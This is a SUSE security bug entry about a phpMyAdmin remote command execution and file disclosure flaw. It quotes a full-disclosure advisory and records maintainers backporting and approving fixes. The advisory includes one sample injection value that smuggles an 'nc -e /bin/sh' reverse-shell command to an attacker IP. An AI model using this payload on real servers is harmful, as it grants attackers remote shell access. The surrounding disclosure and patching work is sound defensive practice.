Bug 64212 (CVE-2004-1148)

Summary:	VUL-0: CVE-2004-1148: phpMyAdmin remote command execution
Product:	[Novell Products] SUSE Security Incidents	Reporter:	Ludwig Nussel <lnussel>
Component:	Incidents	Assignee:	Security Team bot <security-team>
Status:	RESOLVED FIXED	QA Contact:	Security Team bot <security-team>
Severity:	Major
Priority:	P3 - Medium	CC:	security-team
Version:	unspecified
Target Milestone:	---
Hardware:	All
OS:	Linux
Whiteboard:	CVE-2004-1148: CVSS v2 Base Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
Found By:	---	Services Priority:
Business Priority:		Blocker:	---
Marketing QA Status:	---	IT Deployment:	---

Description Ludwig Nussel 2004-12-14 18:08:58 UTC

We received the following report via full-disclosure.
The issue is public.

Date: Mon, 13 Dec 2004 14:02:09 +0100
From: Nicolas Gregoire <ngregoire@exaprobe.com>
To: bugtraq@securityfocus.com, full-disclosure@lists.netsys.com,
	vulnwatch@vulnwatch.org
Cc: 
Subject: [Full-Disclosure] Multiple vulnerabilities in phpMyAdmin

                                Exaprobe
                            www.exaprobe.com

                           Security Advisory

 Advisory Name: Multiple vulnerabilities in phpMyAdmin
  Release Date: 13 December 2004
   Application: phpMyAdmin prior to 2.6.1-rc1
      Platform: Any webserver running PHP
      Severity: Remote code execution
        Author: Nicolas Gregoire <ngregoire@exaprobe.com>
 Vendor Status: Updated code is available
CVE Candidates: CAN-2004-1147 and CAN-2004-1148
     Reference: www.exaprobe.com/labs/advisories/esa-2004-1213.html

Overview :
==========

phpMyAdmin is a tool written in PHP intended to handle the 
administration of MySQL over the Web. Currently it can create and
drop databases, create/drop/alter tables, delete/edit/add fields,
execute any SQL statement, manage keys on fields, manage privileges,
export data into various formats and is available in 47 languages.

Technical details :
===================

Command execution :

	- bug introduced in 2.6.0-pl2
	- attacker does *not* need access to the phpMyAdmin interface
	- PHP safe mode must be off
	- external transformations must be activated
	- sample of offensive value : F\';nc -e /bin/sh $IP 80;echo \'A

File disclosure :

	- attacker need access to the phpMyAdmin interface
	- PHP safe mode must be off
	- $cfg['UploadDir'] must be defined
	- exploitation is done via 'sql_localfile'

Vendor Response :
=================

After notification by Exaprobe, maintainers of the phpMyAdmin
project have released version 2.6.1-rc1 which fixes these two
vulnerabilities.

Recommendation :
================

Upgrade to 2.6.1-rc1 or newer.
Desactivate uploads and transformations if possible.

CVE Information :
=================

The Common Vulnerabilities and Exposures (CVE) project has assigned 
the following names to these issues.  These are candidates for 
inclusion in the CVE list (http://cve.mitre.org), which standardizes 
names for security problems.

  CAN-2004-1147  Command execution in phpMyAdmin
  CAN-2004-1148  File disclosure in phpMyAdmin

Comment 1 Michal Čihař 2004-12-14 19:25:43 UTC

http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2004-4

Should I backport patches or wait for 2.6.1 and update? (I guess update to
release candidate is not an option)

Comment 2 Ludwig Nussel 2004-12-14 19:45:06 UTC

* This comment was added by mail.
Please backport if the effort is sustainable. At least the command
execution sounds rather nasty as it seems to happen before
authentication. I can't judge whether the constraints that are
needed to be able to exploit it are fulfilled in practice though.

Comment 3 Michal Čihař 2004-12-14 19:48:18 UTC

It does not happen before authentication. Attacker needs access to MySQL database.

Comment 4 Michal Čihař 2004-12-14 19:48:35 UTC

Okay, I'll port patches.

Comment 5 Michal Čihař 2004-12-14 21:32:30 UTC

Anyway, we didn't yet fix:

http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2004-3

porting that patch will be more complicated as it touches quite many places...

Comment 6 Michal Čihař 2004-12-14 22:47:26 UTC

I've ported patches to version we have in 9.0-9.2, for olders code seems to be
much changed.

Comment 7 Ludwig Nussel 2004-12-15 00:37:21 UTC

It seems or it in fact is? :-)

Comment 8 Michal Čihař 2004-12-15 00:41:50 UTC

The code is completely different there, so that version might be not vulnerable
or that issue is just better hidden :-)

Comment 9 Ludwig Nussel 2004-12-15 00:50:53 UTC

Ok. Can you please submit the packages you can fix then (so we have the diff). 
Someone of the security-team should have a look at the old verions then.

Comment 10 Michal Čihař 2004-12-15 00:54:59 UTC

Okay, I'll check, whether they work correctly and submit it.

Comment 11 Michal Čihař 2004-12-15 01:33:24 UTC

Submitted fixed packages for 9.0-9.2.

Comment 12 Marcus Meissner 2004-12-15 20:27:32 UTC

"- bug introduced in 2.6.0-pl2" ... 8.2 has 2.4, so I suspect 8.2 and 8.1 
are not affected?

Comment 13 Michal Čihař 2004-12-15 21:05:51 UTC

It was not itroduced in 2.6.0-pl2, but was in all versions that have
transformations (AFAIK 2.5 and newer). However other issues might be also in
older versions.

Comment 14 Marcus Meissner 2004-12-20 22:07:15 UTC

any update here?

Comment 15 Ludwig Nussel 2005-01-04 23:10:54 UTC

the uploaddir thing is present in 8.2 but not 8.1, easy. 
 
bits of the XSS patch can be found in 8.2 and 8.1. The big hunk isn't present. 
I'd suggest to fix the obvious places taking the risk to miss some places 
where quoting should have taken place.

Comment 16 Michal Čihař 2005-01-18 23:53:29 UTC

Fixed packages for 8.1 and 8.2 submitted.

Comment 17 Thomas Biege 2005-01-27 00:19:40 UTC

Created patchinfo file as /work/src/done/PATCHINFO/phpMyAdmin.rKl9hy

Comment 18 Marcus Meissner 2005-01-27 20:10:53 UTC

approved fixed packages

Comment 19 Thomas Biege 2009-10-13 20:04:30 UTC

CVE-2004-1148: CVSS v2 Base Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)